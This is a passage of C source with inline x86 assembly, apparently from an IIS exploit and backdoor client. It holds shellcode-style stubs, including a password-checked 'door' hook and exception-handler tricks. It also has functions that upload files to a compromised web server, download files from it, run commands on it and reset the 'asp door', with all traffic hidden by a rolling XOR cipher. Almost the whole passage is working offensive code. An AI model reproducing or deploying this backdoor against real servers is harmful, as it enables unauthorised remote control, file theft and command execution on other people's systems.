while(k==0x2746){
if(thedoor==1) goto asmreturn;
Sleepadd(0x7fffffff); //����
}
}
else{
WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
// Sleepadd(1000);
}
}
}
die: goto die ;
_asm{
asmreturn:
mov eax,HSE_STATUS_SUCCESS
leave
ret 04
door: push eax
mov eax,[esp+0x08]
mov eax,[eax+0x64]
mov eax,[eax]
cmp eax,'ok!!'
jnz jmpold
pop eax
push 0x12345678 //dooradd-0x13
ret
jmpold: pop eax
push 0x12345678 //dooradd-0xc
ret //1
jmp door //2
getdoorcall: call getdooradd //5
getexceptretadd: pop eax
push eax
mov edi,dword ptr [stradd]
mov dword ptr [edi-0x0e],eax
ret
errprogram: mov eax,dword ptr [esp+0x0c]
add eax,0xb8
mov dword ptr [eax],0x11223344 //stradd-0xe
xor eax,eax //2
ret //1
execptprogram: jmp errprogram //2 bytes stradd-7
nextcall: call getstradd //5 bytes
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
int i,k;
unsigned char temp;
char *calladd;
for(i=0;i<len;++i){
temp=shellbuff[i];
if(temp==0xe8){
k=*(int *)(shellbuff+i+1);
calladd=fnadd;
calladd+=k;
calladd+=i;
calladd+=5;
if(calladd==chkesp){
shellbuff[i]=0x90;
shellbuff[i+1]=0x43; // inc ebx
shellbuff[i+2]=0x4b; // dec ebx
shellbuff[i+3]=0x43;
shellbuff[i+4]=0x4b;
}
}
}
}
void iisput(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i<j;++i,++str){
if(*str!=' '){
filename=str;
break;
}
}
for(;i<j;++i,++str){
if(*str==' ') {
*str=0;
break;
}
}
++i;
++str;
for(;i<j;++i,++str){
if(*str!=' '){
filename2=str;
break;
}
}
for(;i<j;++i,++str){
if(*str==' ') {
*str=0;
break;
}
}
if(filename=="\x0") {
printf("\n iisput filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin put file:%s",filename);
j=0;
ioctlsocket(fd, FIONBIO, &j);
Sleep(1000);
fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,0);
filesize=GetFileSize(fpt,&filesizehigh);
strcpy(buff,"put ");
*(int *)(buff+4)=filesize;
filesize=*(int *)(buff+4);
strcpy(buff+0x8,filename2);
newsend(fd,buff,i+0x9,0);
printf("\n put file:%s to file:%s %d
bytes",filename,filename2,filesize);
Sleep(1000);
while(filesize>0){
size=0x800;
ReadFile(fpt,buff,size,&size,NULL);
if(size>0){
filesize-=size;
newsend(fd,buff,size,0);
// Sleep(0100);
}
}
// size=filesize;
// ReadFile(fpt,buff,size,&size,NULL);
// if(size>0) send(fd,buff,size,0);
CloseHandle(fpt);
j=1;
ioctlsocket(fd, FIONBIO, &j);
printf("\n put file ok!\n");
Sleep(1000);
}
void iisget(int fd,char *str){
char *filename;
char *filename2;
FILE *fpt;
char buff[0x2000];
int size=0x2000,i,j,filesize,filesizehigh;
filename="\0";
filename2="\0";
j=strlen(str);
for(i=0;i<j;++i,++str){
if(*str!=' '){
filename=str;
break;
}
}
for(;i<j;++i,++str){
if(*str==' ') {
*str=0;
break;
}
}
++i;
++str;
for(;i<j;++i,++str){
if(*str!=' '){
filename2=str;
break;
}
}
for(;i<j;++i,++str){
if(*str==' ') {
*str=0;
break;
}
}
if(filename=="\x0") {
printf("\n iisget filename [path\\fiename]\n");
return;
}
if(filename2=="\x0") filename2=filename;
printf("\n begin get file:%s",filename);
fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHAR
E_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
strcpy(buff,"get ");
strcpy(buff+0x4,filename2);
newsend(fd,buff,i+0x5,0);
printf("\n get file:%s from file:%s",filename,filename2);
j=0;
ioctlsocket(fd, FIONBIO, &j);
i=0;
filesize=0;
j=0;
while(j<100){
// Sleep(100);
i=newrecv(fd,buff,0x800,0);
if(i>0){
buff[i]=0;
if(memcmp(buff,"size",4)==0){
filesize=*(int *)(buff+4);
j=100;
}
else {
/* for(j=0;j<i;++j){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[j]^=lockcharvar; // DATAXORCODE;
}
*/
j=0;
printf("\n recv %s",buff);
}
}
else ++j;
// if(j>1000) i=0;
}
printf("\n file %d bytes %d\n",filesize,i);
if(i>8){
i-=8;
filesize-=i;
WriteFile(fpt,buff+8,i,&i,NULL);
}
while(filesize>0){
size=newrecv(fd,buff,0x800,0);
if(size>0){
filesize-=size;
WriteFile(fpt,buff,size,&size,NULL);
}
else {
if(size==0) {
printf("\n ftp close \n ");
}
else {
printf("\n Sleep(100)");
Sleep(100);
}
}
}
CloseHandle(fpt);
printf("\n get file ok!\n");
j=1;
ioctlsocket(fd, FIONBIO, &j);
}
void iisreset(int fd,char *str){
char buff[0x2000];
int i,j;
printf("\nreset xor data.\n");
Sleep(1000);
j=0;
ioctlsocket(fd, FIONBIO, &j);
strcpy(buff,"reset");
newsend(fd,buff,strlen(buff),0);
Sleep(1000);
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
while(1){
j=recv(fd,buff,0x2000,0);
if(j>0){
buff[j]=0;
for(i=0;i<j;++i){
if(buff[i]==0) buff[i]='b';
}
// printf("\nrecv 0x%x bytes:%s",j,buff);
if(strstr(buff,"xordatareset")!=0){
printf("\nxor data reset ok.\n");
for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
}
break;
}
}
// else if(j==0) break;
// strcpy(buff,"\r\nmkdir d:\\test6\r\n");
// newsend(fd,buff,strlen(buff),0);
}
Sleep(1000);
j=1;
ioctlsocket(fd, FIONBIO, &j);
// printf("aaa");
}
void iisdie(int fd,char *str){
char buff[0x200];
int j;
printf("\niis die.\n");
j=0;
ioctlsocket(fd, FIONBIO, &j);
Sleep(1000);
strcpy(buff,"iisrr ");
newsend(fd,buff,strlen(buff),0);
Sleep(1000);
j=1;
ioctlsocket(fd, FIONBIO, &j);
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
}
void iiscmd(int fd,char *str){
char *cmd="\0";
char buff[2000];
int i,j;
j=strlen(str);
for(i=0;i<j;++i,++str){
if(*str!=' '){
cmd=str;
break;
}
}
j=strlen(str);
for(i=0;i<j;++i){
if(*(str+j-i-1)!=' ') {
break;
}
else *(str+j-i-1)=0;
}
if(cmd=="\x0") {
printf("\niiscmd cmd\n");
return;
}
printf("\nbegin run cmd:%s",cmd);
j=0;
ioctlsocket(fd, FIONBIO, &j);
Sleep(1000);
strcpy(buff,"iisc ");
strcat(buff,cmd);
newsend(fd,buff,strlen(buff),0);
Sleep(1000);
j=1;
ioctlsocket(fd, FIONBIO, &j);
/*
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
*/
}
int newrecv(int fd,char *buff,int size,int flag){
int i,k;
k=recv(fd,buff,size,flag);
if(xordatabegin==1){
for(i=0;i<k;++i){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
}
}
else{
if(k>0){
buff[k]=0;
if(strstr(buff,"XORDATA")!=0) {
xordatabegin=1;
for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){
lockintvar1=lockintvar1*0x100;
lockintvar1=lockintvar1%LOCKBIGNUM;
lockcharvar=lockintvar1%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
}
}
}
}
return(k);
}
int newsend(int fd,char *buff,int size,int flag){
int i;
for(i=0;i<size;++i){
lockintvar2=lockintvar2*0x100;
lockintvar2=lockintvar2%LOCKBIGNUM;
lockcharvar=lockintvar2%0x100;
buff[i]^=lockcharvar; // DATAXORCODE;
// buff[i]^=DATAXORCODE;
}
return(send(fd,buff,size,flag));
}
void iishelp(){
printf("\nusage:");
printf("\niisget filename filename. get file from web server.");
printf("\niisput filename filename. put file to web server.");
printf("\niiscmd cmd. run cmd on web server.");
printf("\niisreset. reset the xor data.");
printf("\niisdie. reset the asp door.");
printf("\n\n");
}